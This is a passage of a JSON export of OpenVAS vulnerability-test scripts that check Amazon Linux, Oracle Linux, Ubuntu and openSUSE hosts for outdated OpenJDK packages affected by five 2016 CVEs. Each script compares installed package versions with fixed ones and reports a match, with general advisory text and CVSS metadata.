\"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.67.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.101~2.6.6.1.67.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.67.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.67.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.67.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.67.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "description": "Oracle Linux Local Security Checks ELSA-2016-0676", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0676", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310122934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122934", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0676.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.fi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122934\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:24:50 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0676\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0676 - java-1.7.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0676\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0676.html\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|5)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-accessibility\", rpm:\"java-1.7.0-openjdk-accessibility~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-headless\", rpm:\"java-1.7.0-openjdk-headless~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.0.1.el7_2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.0.1.el5_11\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:13", "description": "Oracle Linux Local Security Checks ELSA-2016-0675", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0675", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-14T00:00:00", "id": "OPENVAS:1361412562310122935", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122935", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0675.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.fi>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.fi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122935\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:24:51 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0675\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0675 - java-1.7.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0675\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0675.html\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\", \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.101~2.6.6.1.0.1.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.101~2.6.6.1.0.1.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.101~2.6.6.1.0.1.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.101~2.6.6.1.0.1.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.101~2.6.6.1.0.1.el6_7\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-2972-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842745", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842745", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for openjdk-6 USN-2972-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842745\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-11 05:23:58 +0200 (Wed, 11 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-3427\", \"CVE-2016-0695\", \"CVE-2016-3425\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for openjdk-6 USN-2972-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openjdk-6'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were discovered\n in the OpenJDK JRE related to information disclosure, data integrity, and\n availability. An attacker could exploit these to cause a denial of service,\n expose sensitive data over the network, or possibly execute arbitrary code.\n (CVE-2016-0686, CVE-2016-0687, CVE-2016-3427)\n\n A vulnerability was discovered in the OpenJDK JRE related to information\n disclosure. An attacker could exploit this to expose sensitive data over\n the network. (CVE-2016-0695)\n\n A vulnerability was discovered in the OpenJDK JRE related to availability.\n An attacker could exploit this to cause a denial of service.\n (CVE-2016-3425)\");\n script_tag(name:\"affected\", value:\"openjdk-6 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2972-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2972-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao:i386\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-cacao:amd64\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm:i386\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-6-jre-jamvm:amd64\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jdk:i386\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jdk:amd64\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre:i386\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre:amd64\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless:i386\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-headless:amd64\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-lib\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero:i386\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-jre-zero:amd64\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-6-source\", ver:\"6b39-1.13.11-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:55", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2016:1265-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851303", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851303\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:01 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2016:1265-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for java-1_7_0-openjdk to version 2.6.6 fixes five security\n issues.\n\n These security issues were fixed:\n\n - CVE-2016-0686: Ensure thread consistency (bsc#976340).\n\n - CVE-2016-0687: Better byte behavior (bsc#976340).\n\n - CVE-2016-0695: Make DSA more fair (bsc#976340).\n\n - CVE-2016-3425: Better buffering of XML strings (bsc#976340).\n\n - CVE-2016-3427: Improve JMX connections (bsc#976340).\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1265-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-accessibility\", rpm:\"java-1_7_0-openjdk-accessibility~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless\", rpm:\"java-1_7_0-openjdk-headless~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-headless-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap\", rpm:\"java-1_7_0-openjdk-bootstrap~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-debuginfo\", rpm:\"java-1_7_0-openjdk-bootstrap-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-debugsource\", rpm:\"java-1_7_0-openjdk-bootstrap-debugsource~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-devel\", rpm:\"java-1_7_0-openjdk-bootstrap-devel~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-bootstrap-devel-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-headless\", rpm:\"java-1_7_0-openjdk-bootstrap-headless~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-bootstrap-headless-debuginfo\", rpm:\"java-1_7_0-openjdk-bootstrap-headless-debuginfo~1.7.0.101~31.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:57:26", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-688)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3426", "CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120678", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120678", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120678\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:11:53 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-688)\");\n script_tag(name:\"insight\", 